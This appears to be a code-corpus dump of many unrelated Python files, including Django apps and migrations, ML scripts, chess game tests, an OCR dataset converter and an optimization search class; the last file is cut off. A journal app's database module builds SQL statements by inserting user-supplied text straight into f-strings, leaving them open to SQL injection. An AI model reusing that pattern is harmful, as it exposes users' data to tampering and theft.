text stringlengths 8 6.05M |
|---|
from django.contrib import admin
from models import event, user_choices, choice
# Register your models here.
admin.site.register(event)
admin.site.register(user_choices)
admin.site.register(choice) |
import torch
import torch.nn as nn
from torch.nn import init
from torch.utils.data import Dataset
import numpy as np
class Temporal_Dataset(Dataset):
def __init__(self, file_name,starting = 0,skip_rows=0, div =3600):
self.data = np.loadtxt(fname=file_name, skiprows=skip_rows)[:,[0,1,3]]
self.time = self.data[:,2]
self.trans_time = (self.time - self.time[0])/div
self.data[:,2] = self.trans_time
self.data[:,[0,1]] = self.data[:,[0,1]] - starting
def __len__(self):
return self.time.shape[0]
def __getitem__(self,idx):
sample = self.data[idx,:]
return sample
|
#coding:utf-8
from django.conf.urls import patterns, url
urlpatterns = patterns('',
url(r'^$', 'collection.views.into_collection'),
url(r'^list/$', 'collection.views.get_collection'),
url(r'^delete/(.+)$', 'collection.views.delete_collection'),
url(r'^Clist/$', 'collection.views.into_a_collection'),
url(r'^Clist/(.+)$', 'collection.views.get_a_collection'),
url(r'^answer/check/$', 'collection.views.check_answer'),
url(r'^note/$', 'collection.views.note'),
)
|
from sys import stdin
N = int(stdin.readline().strip())
for i in range(0, N):
M = int(stdin.readline().strip())
cities = []
for i in range(0,M):
city = str(stdin.readline().strip())
cities.append(city)
sort = list(set(cities))
print(len(sort)) |
# Generated by Django 3.1.4 on 2021-01-16 18:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('recipes', '0008_auto_20210109_1150'),
]
operations = [
migrations.AddField(
model_name='tag',
name='checkbox_style',
field=models.CharField(blank=True, max_length=15),
),
migrations.AddField(
model_name='tag',
name='slug',
field=models.SlugField(blank=True),
),
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Assignment in BMP course - DVB-T transport stream analyser
Author: Jakub Lukac
E-mail: xlukac09@stud.fit.vutbr.cz
Created: 14-10-2019
Testing: python3.6
"""
from ts import TransportStream
# TODO parse args
# TODO prepare output file name
with open("simple_multiplex.ts", "rb") as input_file:
ts = TransportStream(input_file)
|
from django.shortcuts import render, get_object_or_404
from .models import LostItems
from django.core.paginator import Paginator
def HomePage(request):
return render(request, 'HomePage.html', {})
def FindLost(request):
data = LostItems.objects.all().order_by('-findYmd') #날짜순으로 데이터 가져옴.
paginator = Paginator(data, 10)
page = request.GET.get('page')
items = paginator.get_page(page)
return render(request, 'FindLost.html', {'items': items})
def ItemDetail(request, pk):
item = get_object_or_404(LostItems, pk=pk)
return render(request, 'ItemDetail.html', {'item' : item})
def LabPage(request, pk):
item = get_object_or_404(LostItems, pk=pk)
return render(request, 'LabPage.html', {'item' : item})
|
import pandas as pd
import numpy as np
from scipy.sparse import hstack
from sklearn.preprocessing import LabelBinarizer
from sklearn.cross_validation import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import Ridge
from sklearn.metrics import accuracy_score
from sklearn.feature_extraction.text import TfidfVectorizer
data = pd.read_csv("trainingData.csv")
#data = data[0:1000]
# print data
questionValues = data["Question"].values
text = data["Text"].values
print "Extracting TFIDF features"
featureExtractor = TfidfVectorizer()
featureExtractor.fit_transform(list(data["Text"]))
textTFIDF = featureExtractor.transform(list(data["Text"]))
train_categories, test_categories, train_questions, test_questions = train_test_split(
textTFIDF, questionValues)
print train_questions.mean()
print test_questions.mean()
model = LogisticRegression(C=1)
print "Fitting the Model"
model.fit(train_categories, train_questions)
output = model.predict(test_categories)
print output
textFeaturesPerf = accuracy_score(test_questions, output)
print textFeaturesPerf
|
import unittest
import ujson
import fakeredis
from freezegun import freeze_time
from pychess.chess import (
BLACK,
WHITE,
InvalidTurnException,
)
from manager import (
ChessManager,
BoardFactory,
InvalidBoardIdException,
InvalidTurnTokenException,
PlayingBoard,
)
class TestChessManager(unittest.TestCase):
def setUp(self):
super(TestChessManager, self).setUp()
self.fake_redis = fakeredis.FakeStrictRedis()
self.manager = ChessManager(self.fake_redis)
self.board_id = self.manager.create_board(
white_username='white',
black_username='black',
move_left=10,
)
def test_get_invalid_board(self):
with self.assertRaises(InvalidBoardIdException):
self.manager.get_board_by_id('hola-mundo')
def test_save(self):
_board = BoardFactory.size_16()
board_id = '1234567890'
with freeze_time('2020-10-20 13:15:32'):
board = PlayingBoard(_board, 'white player', 'black player', 10)
self.manager._save_board(board_id, board)
self.assertTrue(self.fake_redis.exists('board:1234567890'))
saved_boar_str = self.fake_redis.get('board:1234567890')
restored_board = ujson.loads(saved_boar_str)
board_str = (
('rrhhbbqqkkbbhhrr' * 2) +
('pppppppppppppppp' * 2) +
(' ' * 8) +
('PPPPPPPPPPPPPPPP' * 2) +
('RRHHBBQQKKBBHHRR' * 2)
)
expected_board = {
'board': {
'actual_turn': 'white',
'size': 16,
'board': board_str
},
'white_username': 'white player',
'black_username': 'black player',
'turn_token': None,
'board_id': None,
'white_score': 0,
'black_score': 0,
'move_left': 10,
'created': '2020-10-20 13:15:32',
}
self.assertEqual(
restored_board,
expected_board,
)
def test_create_board(self):
board = self.manager.get_board_by_id(self.board_id)
self.assertIsNotNone(board)
self.assertEqual(board.board.actual_turn, WHITE)
self.assertEqual(board.white_score, 0)
self.assertEqual(board.black_score, 0)
self.assertTrue(self.fake_redis.exists('board:{}'.format(self.board_id)))
def test_invalid_move(self):
with self.assertRaises(InvalidTurnException):
self.manager.move(self.board_id, 2, 3, 3, 3)
board = self.manager.get_board_by_id(self.board_id)
self.assertIsNotNone(board)
self.assertEqual(board.board.actual_turn, WHITE)
self.assertEqual(board.white_score, 0)
self.assertEqual(board.black_score, 0)
def test_move(self):
self.manager.move(self.board_id, 12, 3, 11, 3)
board = self.manager.get_board_by_id(self.board_id)
self.assertIsNotNone(board)
self.assertEqual(board.board.actual_turn, BLACK)
self.assertEqual(board.black_score, 0)
self.assertEqual(board.white_score, 10)
def test_start_game(self):
turn_token = self.manager.challenge('user1', 'user2', 10)
self.assertIsNotNone(turn_token)
def test_move_with_turn_token(self):
board_id = self.manager.challenge('user1', 'user2', 10)
first_turn_token, white_username, actual_turn_color, board, move_left = self.manager.challenge_accepted(board_id)
# initial board turn should be WHITE
self.assertEqual(actual_turn_color, WHITE)
self.assertEqual(move_left, 9)
# move WHITE with token
second_turn_token, black_username, actual_turn_color, board, move_left = self.manager.move_with_turn_token(first_turn_token, 12, 3, 11, 3)
# second board turn should be BLACK
self.assertEqual(actual_turn_color, BLACK)
self.assertEqual(move_left, 8)
# invalid turn token exception
with self.assertRaises(InvalidTurnTokenException):
self.manager.move_with_turn_token(first_turn_token, 12, 4, 11, 4)
# move BLACK with token
third_turn_token, white_username, actual_turn_color, board, move_left = self.manager.move_with_turn_token(second_turn_token, 3, 3, 4, 3)
self.assertIsNotNone(third_turn_token)
self.assertEqual(actual_turn_color, WHITE)
self.assertEqual(move_left, 7)
def test_save_user_stats(self):
board = self.manager.get_board_by_id(self.board_id)
self.manager._save_user_stats(board)
self.assertTrue(
self.fake_redis.exists(self.manager.get_user_stats_key('white'))
)
self.assertTrue(
self.fake_redis.exists(self.manager.get_user_stats_key('black'))
)
self.assertEqual(
self.fake_redis.llen(self.manager.get_user_stats_key('white')),
1,
)
self.assertEqual(
self.fake_redis.llen(self.manager.get_user_stats_key('black')),
1,
)
if __name__ == '__main__':
unittest.main()
|
from django import forms
from django.contrib.auth.forms import PasswordResetForm, UserCreationForm, AuthenticationForm
from django.utils.translation import gettext_lazy as _
from django.contrib.auth import get_user_model
from captcha.fields import ReCaptchaField
from django.conf import settings
class CaptchaPasswordResetForm(PasswordResetForm):
captcha = (
ReCaptchaField()
if settings.RECAPTCHA_PUBLIC_KEY != '' and settings.RECAPTCHA_PRIVATE_KEY != ''
else None
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['email'].widget.attrs.update({'autofocus': 'autofocus'})
def get_users(self, email):
# removed check verifying if password is unusable
user_model = get_user_model()
active_users = user_model._default_manager.filter(**{
'%s__iexact' % user_model.get_email_field_name(): email,
'is_active': True,
})
return active_users
class UsernameOrEmailAuthenticationForm(AuthenticationForm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['username'].label = _("Username / Email")
class UserCreationForm(UserCreationForm):
"""
A UserCreationForm with optional password inputs.
"""
def __init__(self, *args, **kwargs):
super(UserCreationForm, self).__init__(*args, **kwargs)
self.fields['password1'].required = False
self.fields['password2'].required = False
# If one field gets autocompleted but not the other, our 'neither
# password or both password' validation will be triggered.
self.fields['password1'].widget.attrs['autocomplete'] = 'off'
self.fields['password2'].widget.attrs['autocomplete'] = 'off'
def clean_password2(self):
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise forms.ValidationError(
self.error_messages['password_mismatch'],
code='password_mismatch',
)
if bool(password1) ^ bool(password2):
raise forms.ValidationError("Fill out both fields")
return password2 |
# Generated by Django 2.2 on 2020-02-14 09:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('trading', '0010_user_signup_profileimg'),
]
operations = [
migrations.AlterField(
model_name='user_signup',
name='profileimg',
field=models.ImageField(upload_to='images/'),
),
]
|
"""empty message
Revision ID: 0ba15ddf5053
Revises: 2013e180c438
Create Date: 2019-11-13 17:26:36.584040
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '0ba15ddf5053'
down_revision = '2013e180c438'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('milestone', sa.Column('days_estimated', sa.String(length=255), nullable=True))
op.alter_column('milestone', 'date_estimated',
existing_type=postgresql.TIMESTAMP(),
nullable=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('milestone', 'date_estimated',
existing_type=postgresql.TIMESTAMP(),
nullable=False)
op.drop_column('milestone', 'days_estimated')
# ### end Alembic commands ###
|
def swap(matrix, row1, row2, *columns):
result = list(matrix)
for a in columns:
result[row1][a], result[row2][a] = result[row2][a], result[row1][a]
return result
|
import logging
import asyncio
import os
import json
import time
from datetime import datetime
import aiomysql as aiomysql
from aiohttp import web
logging.basicConfig(level=logging.INFO)
def index(request):
return web.Response(body=b'<h1>Awesome</h1>')
@asyncio.coroutine
def init(loop):
app = web.Application(loop=loop)
app.router.add_route('GET', '/test', index)
srv = yield from loop.create_server(app.make_handler(), '127.0.0.1', 9000)
logging.info('server started at http://127.0.0.1:9000...')
return srv
loop = asyncio.get_event_loop()
loop.run_until_complete(init(loop))
loop.run_forever()
@asyncio.coroutine
def create_pool(loop, **kw):
logging.info('create database connection pool...')
global __pool
__pool = yield from aiomysql.create_pool(host=kw.get('host', 'localhost'),
port=kw.get('port', 3306),
user=kw['user'],
password=kw['password'],
db=kw['db'],
charset=kw.get('charset', 'utf8'),
autocommit=kw.get('autocommit', True),
maxsize=kw.get('maxsize', 10),
minsize=kw.get('minsize', 1),
loop=loop)
|
class LinkedList:
next=None
val=None
def __init__(self,val):
self.val=val
def add(self,val):
if (self.next==None):
self.next=LinkedList(val)
else:
self.next.add(val)
def __str__(self):
return "({val})".format(val=self.val)+str(self.next)
class BinaryTree:
val=None
left=None
right=None
def __init__(self,val):
self.val=val
def __str__(self):
return "<Binary Tree (val is {val}). \n\tleft is {left} \n\tright is {right}>".format(val=self.val,
left=self.left,
right=self.right)
def depth(tree):
if(tree==None):
return 0
if(tree.left ==None and tree.right==None):
return 1
else:
leftdepth=1+depth(tree.left)
rightdepth=1+depth(tree.right)
if leftdepth>rightdepth:
return leftdepth
else:
return rightdepth
def tree_to_linkedlist(tree,lists={},d=None):
if(d==None):
d=depth(tree)
if (lists.get(d)==None):
lists[d]=LinkedList(tree.val)
else:
lists[d].add(tree.val)
if d==1:
return lists
if tree.left!=None:
lists=tree_to_linkedlist(tree.left,lists,d-1)
if tree.right!=None:
lists=tree_to_linkedlist(tree.right,lists,d-1)
return lists
if __name__ == '__main__':
mainTree = BinaryTree(1)
someSubTrees = {"left": BinaryTree(2), "right": BinaryTree(3)}
someSubTrees["left"].left = BinaryTree(4)
someSubTrees["left"].right = BinaryTree(5)
someSubTrees["right"].left = BinaryTree(6)
someSubTrees["right"].right = BinaryTree(7)
someSubTrees["right"].right.right = BinaryTree(8)
someSubTrees["left"].left.left = BinaryTree(9)
mainTree.left = someSubTrees["left"]
mainTree.right = someSubTrees["right"]
ttll = tree_to_linkedlist(mainTree)
for depthLevel, linkedList in ttll.iteritems():
print "{0} {1}".format(depthLevel, linkedList)
|
from docx.table import Table
from docx.text.paragraph import Paragraph
def print_children(indent, node):
for ch in node.children:
print ' '*indent, ch.name
print_children(indent+1, ch)
def print_block(block):
if isinstance(block, Paragraph):
print_paragraph(block)
if isinstance(block, Table):
print_table(block)
def print_paragraph(p):
print p.text
def print_cell(cell):
for p in cell.paragraphs:
print_paragraph(p)
def print_table(t):
for row in t.rows:
for cell in row.cells:
print_cell(cell)
def print_block_type_count(n):
table_count = 0
paragraph_count = 0
for b in n.blocks:
if isinstance(b, Paragraph):
paragraph_count += 1
if isinstance(b, Table):
table_count += 1
print n.name, table_count, paragraph_count
|
import csv
from lxml import etree
from collections import defaultdict
with open("../work/done.csv") as csvfile:
network_dict = csv.DictReader(csvfile, delimiter=";")
dictionnaire_estrada = {}
dictionnaire_milo = {}
dictionnaire_milo_estrada ={}
dictionnaire_gen_category ={}
dictionnaire_gen_estrada ={}
dictionnaire_gen_milo ={}
dictionnaire_complet={}
def add(dico,key,key2):
if key not in dico :dico[key] ={}
if key2 not in dico[key]: dico[key][key2] =0
dico[key][key2]+=1
for network in network_dict:
try:
if int(network['nb_nodes']) < 1000 :
path_to_file = "../work/files/" + network['number'] + "-" + network['name'] + "/" + network['name']
tree = etree.parse(path_to_file + "_results.xml")
results = tree.getroot()
category = str(results.find("category").get("type"))
gen2 = results.find("gen")
gen = str(gen2.find("classe_gen").get("classe"))
#print gen
add(dictionnaire_gen_category,gen,category)
#if results.find("motifs") is not None or results.find("estrada_score") is not None :
if results.find("estrada_score") is not None :
classe = str(results.find("estrada_score").find("classe").get("score"))
#print("['"+classe+"' , '"+category+"' , 1]")
add(dictionnaire_estrada,classe,category)
add(dictionnaire_gen_estrada,classe,gen)
if results.find("motifs") is not None:
milo = results.find("motifs").find("classe_milo")
if milo is not None :
milo_classe = str(milo.get("classe"))
add(dictionnaire_gen_milo,milo_classe,gen)
add(dictionnaire_milo,milo_classe,category)
if results.find("motifs") is not None and results.find("estrada_score") is not None :
#print "1"
estrada_classe = str(results.find("estrada_score").find("classe").get("score"))
milo_classe = str(results.find("motifs").find("classe_milo").get("classe"))
add(dictionnaire_milo_estrada,milo_classe,estrada_classe)
dictionnaire_complet[network['name']]={}
dictionnaire_complet[network['name']]["ep"]=round(float(results.find("estrada_score").find("eplus").get("score")),2)
dictionnaire_complet[network['name']]["em"]=round(float(results.find("estrada_score").find("eminus").get("score")),2)
dictionnaire_complet[network['name']]["mclass"]=milo_classe
dictionnaire_complet[network['name']]["eclass"]=estrada_classe
except AttributeError:
pass
def print_pdf():
for network,data in dictionnaire_complet.iteritems() :
name = network.replace("_","-")
print("\\tableline{"+name+"}{"+str(data["ep"])+"}{"+str(data["em"])+"}{"+data["eclass"]+"}{"+name+"}{"+data["mclass"]+"}\\\\")
def print_estrada():
for classe,item in dictionnaire_estrada.iteritems() :
for category,number in item.iteritems():
print("['"+category+"' , '"+classe+"' , "+str(number)+"],")
def print_milo():
for classe,item in dictionnaire_milo.iteritems() :
for category,number in item.iteritems():
print("['"+category+"' , '"+classe+"' , "+str(number)+"],")
def print_milo_estrada():
for classe,item in dictionnaire_milo_estrada.iteritems() :
for category,number in item.iteritems():
print("['"+category+"' , '"+classe+"' , "+str(number)+"],")
def print_2(dictionnaire):
for classe,item in dictionnaire.iteritems() :
for category,number in item.iteritems():
print("['"+category+"' , '"+classe+"' , "+str(number)+"],")
def print_gen():
print_2(dictionnaire_gen_estrada)
print_2(dictionnaire_gen_category)
print_2(dictionnaire_gen_milo)
print_pdf() |
import json
from pathlib import Path
from PIL import Image
from util.dataset_logger import dataset_logger as logger
from util.db.Wrappers import MongoWrapper as db
from util.db.model import RawEntry, SanitizedEntry
p = Path(__file__).parent / 'dump' / "dataset"
sanimg = p / "images"
db_wrapper = db.MongoWrapper()
def crop_image(img: Image, meta: SanitizedEntry, idx: int):
name = f'{meta.reddit_id}_{str(meta.weight).replace(".", "-")}_{meta.age}_{idx}.jpg'
new_path = sanimg / name
img.crop(meta.bounding_box.to_tuple()).save(new_path)
return new_path
def get_features_in_crop(r: RawEntry, s: SanitizedEntry):
for key, metas in r.raw_meta.items():
crop_features = set()
for m in metas:
res = s.bounding_box.contains(m.bounding_box)
if res:
crop_features.add(key)
return list(crop_features)
if __name__ == "__main__":
if not sanimg.is_dir():
sanimg.mkdir(parents=True, exist_ok=True)
metadata = []
errors = 0
with db_wrapper.session_scope():
for r in RawEntry.objects(has_been_sanitized=True):
try:
img = Image.open(r.local_path)
for idx, s in enumerate(r.sanitized_entries):
img_path = crop_image(img, s, idx)
obj = {
"weight": float(s.weight),
"age": s.age,
"sex": r.sex,
"reddit_id": r.reddit_id,
"features": get_features_in_crop(r, s),
"path": img_path.name
}
metadata.append(obj)
except Exception as e:
logger.error(f"{img_path} crashed with {e}")
errors += 1
logger.info(f"Had {errors} errors")
with open(p / "meta.json", "w") as d:
json.dump(metadata, d)
|
import json
import nlp_utils as nlp
from datetime import date
import mysql.connector as connector
from app_config import MYSQL_PASSWORD
def get_conn_cursor():
conn = connector.connect(
host='localhost',
database='euva',
user='root',
password=MYSQL_PASSWORD)
cursor = conn.cursor()
return conn, cursor
def close_conn_cursor(conn, cursor):
cursor.close()
conn.close()
def execute(cmd, fetch=None, commit=False):
returnable = None
conn, cursor = get_conn_cursor()
cursor.execute(cmd)
if commit:
conn.commit()
if fetch == 'all':
returnable = cursor.fetchall()
elif fetch == 'one':
returnable = cursor.fetchone()
close_conn_cursor(conn, cursor)
return returnable
def create_user(userinfo):
_id = userinfo['id']
for table in execute('SHOW TABLES', fetch='all'):
if table[0].replace('user_', '') == _id: return
execute(f'CREATE TABLE user_{_id}(journal_date DATE NOT NULL PRIMARY KEY, journal_entry TEXT NOT NULL, sentiment_score DECIMAL(4, 2) ZEROFILL NOT NULL)', commit=True)
def today_journal_blocks(userinfo):
_id = userinfo['id']
journal_entry = execute(f'SELECT journal_entry FROM user_{_id} WHERE journal_date="{date.today()}"', fetch='one')
if not journal_entry is None:
journal_entry = nlp.replace_journal(journal_entry[0], (1, 0)).replace(' ', ' ')
journal_entry = json.loads(journal_entry)
if journal_entry['blocks']:
return execute(f'SELECT journal_entry FROM user_{_id} WHERE journal_date="{date.today()}"', fetch='one')[0]
return str({'blocks': [{'type': 'header', 'data': {'text': 'Journal - ' + date.today().strftime('%B %d, %Y'), 'level': 2}}]})
def save_journal_entry(userinfo, form):
_id = userinfo['id']
journal_entry = json.loads(form['journal-entry-input'].replace(' ', ' '))
del journal_entry['time']
del journal_entry['version']
sentiment_score = nlp.sentiment_score(journal_entry)
journal_entry = nlp.replace_journal(json.dumps(journal_entry), (0, 1))
for journal_date in execute(f'SELECT journal_date FROM user_{_id}', fetch='all'):
if journal_date[0].strftime('%Y-%m-%d') == str(date.today()):
execute(f'UPDATE user_{_id} SET journal_entry="{journal_entry}", sentiment_score={sentiment_score} WHERE journal_date="{date.today()}"', commit=True)
return True
execute(f'INSERT INTO user_{_id}(journal_date, journal_entry, sentiment_score) values("{date.today()}", "{journal_entry}", {sentiment_score})', commit=True)
return True
def journal_from_date(user_id, journal_date):
journal_dates = execute(f'SELECT journal_date FROM user_{user_id}', fetch='all')
for db_date in journal_dates:
if db_date[0].strftime('%Y-%m-%d') == journal_date:
return execute(f'SELECT journal_entry, sentiment_score FROM user_{user_id} WHERE journal_date="{journal_date}"', fetch='one')
return 'Invalid Date'
def journal_from_dates(user_id, dates):
journal_dates = execute(f'SELECT journal_date FROM user_{user_id}', fetch='all')
for journal_date in journal_dates:
for date in dates:
if date.strftime('%Y-%m-%d') == journal_date[0].strftime('%Y-%m-%d'):
return date.strftime('%Y-%m-%d')
def last_five_journals(userinfo):
_id = userinfo['id']
dataset = execute(f'SELECT journal_date, sentiment_score FROM user_{_id}', fetch='all')
for i in range(len(dataset)):
dataset[i] = list(dataset[i])
dataset[i].append(dataset[i][0].strftime('%b %d'))
dataset[i][0] = dataset[i][0].strftime('%Y-%m-%d')
dataset[i][1] = float(dataset[i][1])
return dataset
def sentiment_scores(userinfo):
_id = userinfo['id']
return [float(s[0]) for s in execute(f'SELECT sentiment_score FROM user_{_id}', fetch='all')]
def latest_journal_date():
return execute('SELECT max(journal_date) from user_109041459781692369999', fetch='one')[0].strftime('%Y-%m-%d')
|
# Copyright 2009-2010 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
import itertools
import stat
from portage.const import PORTAGE_BIN_PATH, PORTAGE_PYM_PATH
from portage.tests import TestCase
from portage import os
from portage import _encodings
from portage import _unicode_decode, _unicode_encode
import py_compile
class CompileModulesTestCase(TestCase):
def testCompileModules(self):
for parent, dirs, files in itertools.chain(
os.walk(PORTAGE_BIN_PATH),
os.walk(PORTAGE_PYM_PATH)):
parent = _unicode_decode(parent,
encoding=_encodings['fs'], errors='strict')
for x in files:
x = _unicode_decode(x,
encoding=_encodings['fs'], errors='strict')
if x[-4:] in ('.pyc', '.pyo'):
continue
x = os.path.join(parent, x)
st = os.lstat(x)
if not stat.S_ISREG(st.st_mode):
continue
do_compile = False
if x[-3:] == '.py':
do_compile = True
else:
# Check for python shebang
f = open(_unicode_encode(x,
encoding=_encodings['fs'], errors='strict'), 'rb')
line = _unicode_decode(f.readline(),
encoding=_encodings['content'], errors='replace')
f.close()
if line[:2] == '#!' and \
'python' in line:
do_compile = True
if do_compile:
py_compile.compile(x, cfile='/dev/null', doraise=True)
|
import os
import random
from .base import BaseDataset
class MUSICMixDataset(BaseDataset):
def __init__(self, list_sample, opt, **kwargs):
super(MUSICMixDataset, self).__init__(
list_sample, opt, **kwargs)
self.fps = opt.frameRate
self.num_mix = opt.num_mix
self.rgbs_feature = opt.rgbs_feature
def __getitem__(self, index):
N = self.num_mix
points = [None for n in range(N)]
coords = [None for n in range(N)]
rgbs = [None for n in range(N)]
audios = [None for n in range(N)]
infos = [[] for n in range(N)]
path_frames = [[] for n in range(N)]
path_audios = ['' for n in range(N)]
# the first point cloud video
instruments = []
infos[0] = self.list_sample[index]
path_instr = self.list_sample[index][0]
instr = os.path.basename(os.path.dirname(path_instr))
instruments.append(instr)
# sample other point cloud videos
if not self.split == 'train':
random.seed(index)
while len(instruments) != N:
indexN = random.randint(0, len(self.list_sample)-1)
path_instr = self.list_sample[indexN][0]
instr = os.path.basename(os.path.dirname(path_instr))
if instr not in instruments:
infos[len(instruments)] = self.list_sample[indexN]
instruments.append(instr)
# select point cloud frames
idx_margin = (self.num_frames // 2) * self.stride_frames
for n, infoN in enumerate(infos):
path_audioN, path_frameN, count_framesN = infoN
center_frameN = random.randint(
idx_margin+1, int(count_framesN)-idx_margin-1)
# absolute frame/audio paths
for i in range(self.num_frames):
idx_offset = (i - self.num_frames // 2) * self.stride_frames
path_frames[n].append(
os.path.join(
path_frameN,
'{:05d}.ply'.format(center_frameN + idx_offset)))
path_audios[n] = path_audioN
for n, infoN in enumerate(infos):
points[n], coords[n], rgbs[n] = self._load_frames(path_frames[n])
audios[n] = self._load_audio(path_audios[n])
mag_mix, mags, phase_mix = self._mix_n_and_stft(audios)
ret_dict = {'mag_mix': mag_mix, 'mags': mags}
if self.split != 'train':
ret_dict['audios'] = audios
ret_dict['phase_mix'] = phase_mix
ret_dict['infos'] = infos
return ret_dict, (coords, points, rgbs, self.rgbs_feature)
|
# Generated by Django 2.2.7 on 2019-11-23 18:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('info', '0004_auto_20191123_1854'),
]
operations = [
migrations.AlterField(
model_name='compensation',
name='additional_info',
field=models.TextField(default='', max_length=2048),
),
migrations.AlterField(
model_name='compensation',
name='requirements',
field=models.TextField(default='', max_length=2048),
),
]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 30 17:35:00 2020
@author: kevin
This file is to convert the NEOCR dataset (with jpg and xml files) to Tesseract friendly format (tif and box files)
Makes it usable for training
"""
import utils
import os
import sys
import cv2
from lxml import etree
# initialize logger
log = utils.set_logging()
dir_neocr = 'C:/Users/kevin/OneDrive/Studium/4_WiSe20_21/1_W3-WM/app_data/NEOCR/neocr_smallset_kevin'
log.info('Start handling directory ' + str(dir_neocr))
listOfFiles = os.listdir(dir_neocr)
total_images = len(listOfFiles)
image_counter = 0
script_dir = os.path.dirname(os.path.abspath(__file__))
target_path = os.path.join(script_dir, 'NEOCR_TIF_BOX')
for file in listOfFiles:
image_counter = image_counter + 1
log.info('Start handling image ' + str(image_counter) + ' of ' + str(total_images) + ': ' + str(file))
try:
file_path = os.path.join(dir_neocr, file)
# handle jpg files
if file[-3:] == 'jpg':
image = cv2.imread(file_path)
filename_tif = file[0:-4] + '.tif'
cv2.imwrite(os.path.join(target_path, filename_tif), image)
# handle xml files
if file[-3:] == 'xml':
tree = etree.parse(file_path)
root = tree.getroot()
for child in root.findall('properties'):
for x in child.findall('height'):
height = int(x.text)
xml_data = ''
for obj in root.findall('object'):
polygon = obj.find('polygon')
x_values = []
y_values = []
for pt in polygon.findall('pt'):
x_values.append(int(pt.find('x').text))
y_values.append(int(pt.find('y').text))
symbol = obj.find('text').text.replace('<br/>', ';').replace(' ', ';')
left = x_values[0]
bottom = height - y_values[2]
right = x_values[1]
top = height - y_values[0]
page = 0
xml_data = xml_data + symbol + ' ' + str(left) + ' ' + str(bottom) + ' ' + str(right) + ' ' + str(top) + ' ' + str(page) + '\n'
filename_box = file[0:-4] + '.box'
box_file = open(os.path.join(target_path, filename_box), 'w', encoding='utf-8')
# box_file = open(filename_box, 'w', encoding='utf-8')
box_file.write(xml_data)
box_file.close()
except Exception as e:
log.error('There was a problem handling the image ' + str(file) + ': ' + str(e)) |
from django.urls import path
from tweet.views import homepage
urlpatterns = [
path('tweet', homepage, name='tweet'),
] |
#!/usr/bin/env python3
import logging
log=logging.getLogger('fea.search')
import numpy as np
from .Halfspace import Halfspace
from .util import lstsq
from .VWrapper import VWrapper
class Search:
_multiplier=10
_max_iterations=10
def __init__(self,model,vars,eps=10**-6,clone=True):
"""
Class for an FEA searcher for finding new halfspaces
This is separated from :class:`fea.LatticeGraph` to enable future parallelization
Parameters
----------
model : :class:`optlang.Model`
The model to solv
vars : iterable
A list of target variables contained in the model
eps : float
Detection limit. Default 1E-6
clone : bool
Whether to clone the model or just use the existing one
"""
self.interface=model.interface
if clone:
self.m=self.interface.Model.clone(model)
else:
self.m=model
# Variables
self.v=[VWrapper(v,self.m) for v in vars]
# Detection Limit
self.eps=eps
# Length
self.n=len(self.v)
# Halfspaces
self.H=None
# Current halfspace constraint
self.H_cons=None
# Objective
self.O=None
def deactivate(self):
"""Remove the current constraint"""
self.m.remove(self.H_cons)
def activate(self):
"""Add the current constraint"""
self.m.add(self.H_cons)
self.m.objective=self.interface.Objective(np.dot(self.O,self.vexpr))
def set(self,obj,hps):
"""Set the current constraint
Parameters
----------
obj: :class:`numpy.ndarray`
The objective function vector
hps: iterable of :class:`fea.Halfspace`
List of Halfspaces to use as the current solution
"""
# Deactivate previous constraints
if self.H_cons is not None:
self.deactivate()
# Update the search for a new search
self.H=list(hps)
# self.H_cons=[h._ol_new_constraint(self.vexpr,self.interface,eps=self.eps) for h in self.H]
self.H_cons=[h._ol_new_constraint(self.m,eps=self.eps) for h in self.H]
self.O=obj/np.linalg.norm(obj)
# Go ahead and activate the new problem
self.activate()
@property
def vexpr(self):
"""Variable expressions"""
return [v.expr for v in self.v]
@property
def vp(self):
"""Variable primal values"""
return [v.primal for v in self.v]
@property
def vd(self):
"""Variable dual values"""
return [v.dual for v in self.v]
def Hd(self,i=None):
"""
Halfspace duals
Parameters
----------
i: int
Optional index of which halfspace to get the dual from. Defaults to all
Returns
-------
Halfspace dual values
"""
if i is not None:
return self.H[i]._ol_dual(self.m)
return [h._ol_dual(self.m) for h in self.H]
def Heps(self,i=None):
"""
Halfspace epsilon values
Parameters
----------
i: int
Optional index of which halfspace to get the epsilon from. Defaults to all
Returns
-------
Halfspace epsilon values
"""
if i is not None:
return self.H[i]._ol_eps(self.m)
return [h._ol_eps(self.m) for h in self.H]
def get_solution(self,_i=0):
"""
Attempt to solve the currently set problem
Returns
-------
Boolean indicating whether it was able to find an optimal solution
"""
self.m.optimize()
if self.m.status != 'optimal': # Could also check whether =='infeasible'
log.info('Solver returned status of '+self.m.status)
if _i<self._max_iterations:
self.perturb_cons()
return self.get_solution(_i+1)
else:
return False
log.info('Optimal solution obtained at '+str(self.vp))
return True
# Randomly (unless otherwise specified) shift a halfspace constraint
def perturb_cons(self,index=None):
"""
Randomly perturb one halfspace constraint to find a new solution
"""
if index is None:
index=np.random.randint(len(self.H))
eps=np.random.uniform(high=self.Heps(index))
if log.getEffectiveLevel()<=10: # Somewhat expensive logging operation
log.info('Changing '+str(self.H[index])+' to have eps='+str(eps))
rhs=self.H[index].rhs+eps
self.H_cons[index].ub=None
self.H_cons[index].lb=rhs
self.H_cons[index].ub=rhs
# Returns a real Facet or None if it couldn't find anything!
def bounding_halfspace(self):
"""
Finds a bounding halfspace for this search
Returns
-------
:class:`fea.Halfspace` representing a new bound for the search
"""
ssemax=(self.eps**2)*self.n
A=[self.O]
b=[-1]
A1_base=np.array([h.norm for h in self.H]+[self.O])
b1_base=np.array([h._ol_rhs(self.m) for h in self.H]+[self.m.objective.value])
# If we don't have enough constraints/duals to fully determine the system!
